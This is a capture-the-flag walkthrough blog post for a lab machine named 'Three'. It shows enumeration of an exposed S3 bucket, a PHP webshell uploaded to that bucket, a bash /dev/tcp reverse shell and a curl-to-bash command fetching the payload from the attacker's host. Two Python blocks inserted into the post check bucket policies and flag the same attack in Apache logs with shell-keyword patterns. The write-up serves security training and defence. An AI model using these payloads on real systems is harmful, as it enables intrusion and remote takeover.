
Three

  • Admin
  • Aug 1, 2023
  • 2 min read

Updated: Apr 29, 2024

As usual, let's start with nmap:

nmap -sV -sC targetIp

Let's add the target IP to the /etc/hosts file:

cd /etc
sudo nano hosts

We found that port 80 is open, so let's check the website.

Now let's use gobuster to enumerate virtual hosts (subdomains):

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb --append-domain

We found s3.thetoppers.htb.


Let's add s3.thetoppers.htb to the /etc/hosts file too.


We can interact with the S3 bucket using awscli:


sudo apt install awscli
aws configure


Just type "temp" for every prompt.


We can list all of the S3 buckets hosted by the server using the ls command:

aws --endpoint=http://s3.thetoppers.htb s3 ls

We can use the ls command to list the objects and common prefixes under the specified bucket:

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb


We can see the files index.php and .htaccess and a directory called images in the S3 bucket.

It looks like the Apache server is using this S3 bucket as storage for the website.


We can use awscli not only to read files using ls, but also to copy files to the remote bucket.


First, let's create shell.php containing the code below:

<?php system($_GET["cmd"]); ?>

Now let's copy shell.php to the remote bucket using:

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

We have successfully uploaded shell.php to the bucket.
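What makes this upload possible is a bucket that anonymous callers can both list and write to while Apache serves pages straight out of it. The check below is an added example in Python, not code from the original post: it reads an S3 bucket policy document and reports which dangerous actions an Allow statement grants to an anonymous principal, with a constructed weak policy (the situation on this box) next to a hardened one. Only the bucket name comes from the box; the deployer role ARN, the account id and both policy documents are constructed for illustration.

```python
"""Check an S3 bucket policy for grants to anonymous principals.

Added example, not from the original post. The policies below are
constructed to mirror the walkthrough: a bucket that Apache serves from,
which anyone can list and write to, next to a hardened version.
"""
import json
from fnmatch import fnmatch

# Actions that let an anonymous caller enumerate or change the bucket behind
# the web root. Anonymous s3:PutObject on such a bucket is code execution,
# which is exactly what the shell.php upload demonstrated.
DANGEROUS_ACTIONS = {
    "s3:ListBucket": "anyone can list every object (aws s3 ls)",
    "s3:PutObject": "anyone can upload files into the web root (aws s3 cp)",
    "s3:DeleteObject": "anyone can delete site files",
    "s3:PutBucketPolicy": "anyone can rewrite this policy",
}

BUCKET = "thetoppers.htb"  # bucket name from the box


def _as_list(value):
    """IAM policy elements may be a single string or a list; normalise."""
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True when the Principal element grants to everyone: "*" or AWS:"*"."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def anonymous_grants(policy):
    """Return {action: explanation} for every dangerous action an Allow
    statement grants to an anonymous principal. Deny statements and
    Condition blocks are ignored, so the check over-reports rather than
    under-reports; review any hit by hand."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    found = {}
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if not _is_anonymous(stmt.get("Principal")):
            continue
        for pattern in _as_list(stmt.get("Action", [])):
            for action, why in DANGEROUS_ACTIONS.items():
                # IAM action names are case-insensitive and may be wildcarded
                if fnmatch(action.lower(), pattern.lower()):
                    found[action] = why
    return found


# Constructed weak policy: everyone may read, list, and run any s3:Put* action.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"AWS": ["*"]},
        "Action": ["s3:GetObject", "s3:ListBucket", "s3:Put*"],
        "Resource": [f"arn:aws:s3:::{BUCKET}", f"arn:aws:s3:::{BUCKET}/*"],
    }],
}

# Constructed hardened policy: anonymous callers may only fetch objects;
# listing and all writes are reserved for an identified deploy role.
# The account id and role name are placeholders.
HARDENED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:GetObject",
            "Resource": f"arn:aws:s3:::{BUCKET}/*",
        },
        {
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::123456789012:role/site-deployer"},
            "Action": ["s3:ListBucket", "s3:PutObject", "s3:DeleteObject"],
            "Resource": [f"arn:aws:s3:::{BUCKET}", f"arn:aws:s3:::{BUCKET}/*"],
        },
    ],
}


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        hits = anonymous_grants(json.dumps(policy))
        print(f"{name}: {len(hits)} anonymous dangerous grant(s)")
        for action, why in hits.items():
            print(f"  {action}: {why}")
```

On AWS the document to feed in comes from aws s3api get-bucket-policy --bucket <name> --query Policy --output text; whether the S3-compatible server on this box exposes a policy API at all is not something the post shows. The same idea applies to bucket ACLs and public-access-block settings, which this check does not read.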


Let's go back to our browser and type:

thetoppers.htb/shell.php?cmd=id


This confirms we have code execution on the box.


Now we will use a reverse shell to make the victim connect back to our attacker machine.


Let's get a reverse shell by creating a new file shell.sh containing:

#!/bin/bash
bash -i >& /dev/tcp/<attackerIP>/1337 0>&1

Now let's listen on port 1337 using:

nc -lnvp 1337

Now we need to host shell.sh on our own web server.


Let's create a local web server using:

python3 -m http.server 8000

We can use curl to fetch the shell.sh file from our local web server and pipe it to bash in order to execute it:

http://thetoppers.htb/shell.php?cmd=curl%20<attackerIP>:8000/shell.sh|bash

Let's go back to our netcat listener, and we got the shell!
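Both of the steps this walkthrough relies on, the vhost wordlist run against thetoppers.htb and the curl-to-bash delivered through shell.php, leave a clear trace in the web server's access log. The script below is an added example in Python, not code from the original post: it parses Apache access-log lines and flags clients that request an unusual number of distinct Host values, as well as requests whose query string uses a webshell-style parameter name or carries shell syntax. It assumes a custom LogFormat that records the Host request header with %{Host}i (the standard combined format does not, and %v only shows which virtual host the request fell through to); the log lines, client addresses, user agents and the threshold are constructed for illustration.

```python
"""Flag vhost brute-forcing and webshell command injection in Apache logs.

Added example, not from the original post. Assumes a custom LogFormat that
records the Host request header, so wordlist guesses stay visible even when
they all land on the default virtual host:
  LogFormat "%{Host}i %h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" hostlog
All log lines, addresses and thresholds below are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$'
)

# Parameter names webshells commonly use, and shell syntax that has no
# business in a query-string value on a static site.
WEBSHELL_PARAMS = {"cmd", "c", "exec", "command", "execute"}
SHELL_RE = re.compile(r"\||;|&&|`|\$\(|/dev/tcp/|\b(?:curl|wget|bash|nc|sh)\b")


def parse_line(line):
    """Fields of one access-log line, or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def find_vhost_scanners(entries, threshold=10):
    """Clients that asked for more than `threshold` distinct Host values:
    the footprint of a gobuster-style vhost wordlist run."""
    hosts = defaultdict(set)
    for e in entries:
        hosts[e["client"]].add(e["host"].lower())
    return {c: len(h) for c, h in hosts.items() if len(h) > threshold}


def find_command_injection(entries):
    """Requests whose query string uses a webshell-style parameter name or
    carries shell syntax such as a pipe into bash."""
    hits = []
    for e in entries:
        parts = urlsplit(e["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name.lower() in WEBSHELL_PARAMS or SHELL_RE.search(value):
                hits.append({"client": e["client"], "host": e["host"],
                             "path": parts.path, "param": name, "value": value})
    return hits


def analyze(lines, threshold=10):
    """Run both detections over raw log lines; unparsable lines are skipped."""
    entries = [e for e in map(parse_line, lines) if e]
    return {"vhost_scanners": find_vhost_scanners(entries, threshold),
            "command_injection": find_command_injection(entries)}


# Constructed sample: a vhost wordlist run from 198.51.100.7, normal browsing
# from 192.0.2.10, then the same scanner driving shell.php.
_T = "01/Aug/2023:10:00:01 +0000"
_GUESSES = ["admin", "mail", "dev", "test", "staging", "api", "blog", "shop",
            "vpn", "beta", "s3", "portal"]
SAMPLE_LOG = [
    f'{g}.thetoppers.htb 198.51.100.7 - - [{_T}] "GET / HTTP/1.1" '
    f'{"200" if g == "s3" else "404"} 196 "-" "gobuster/3.5"'
    for g in _GUESSES
] + [
    f'thetoppers.htb 192.0.2.10 - - [{_T}] "GET /index.php HTTP/1.1" 200 11952 "-" "Mozilla/5.0"',
    f'thetoppers.htb 192.0.2.10 - - [{_T}] "GET /index.php?page=2 HTTP/1.1" 200 11952 "-" "Mozilla/5.0"',
    f'thetoppers.htb 198.51.100.7 - - [{_T}] "GET /shell.php?cmd=id HTTP/1.1" 200 54 "-" "Mozilla/5.0"',
    f'thetoppers.htb 198.51.100.7 - - [{_T}] "GET /shell.php?cmd=curl%20198.51.100.7:8000/shell.sh|bash HTTP/1.1" 200 - "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for client, n in report["vhost_scanners"].items():
        print(f"vhost brute-force: {client} requested {n} distinct Host values")
    for h in report["command_injection"]:
        print(f"command injection: {h['client']} -> {h['host']}{h['path']} "
              f"{h['param']}={h['value']!r}")
```

The distinct-Host count is the more robust of the two signals, since the user agent is trivial to change; the parameter-name and shell-syntax match is a cheap triage filter and will miss a webshell that uses an unexpected parameter and a harmless-looking value such as "id", so a new .php object appearing in the bucket (compare the ls output before and after) is the stronger indicator on this box.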


The flag is in the flag.txt file.

©2025 by My Tech On IT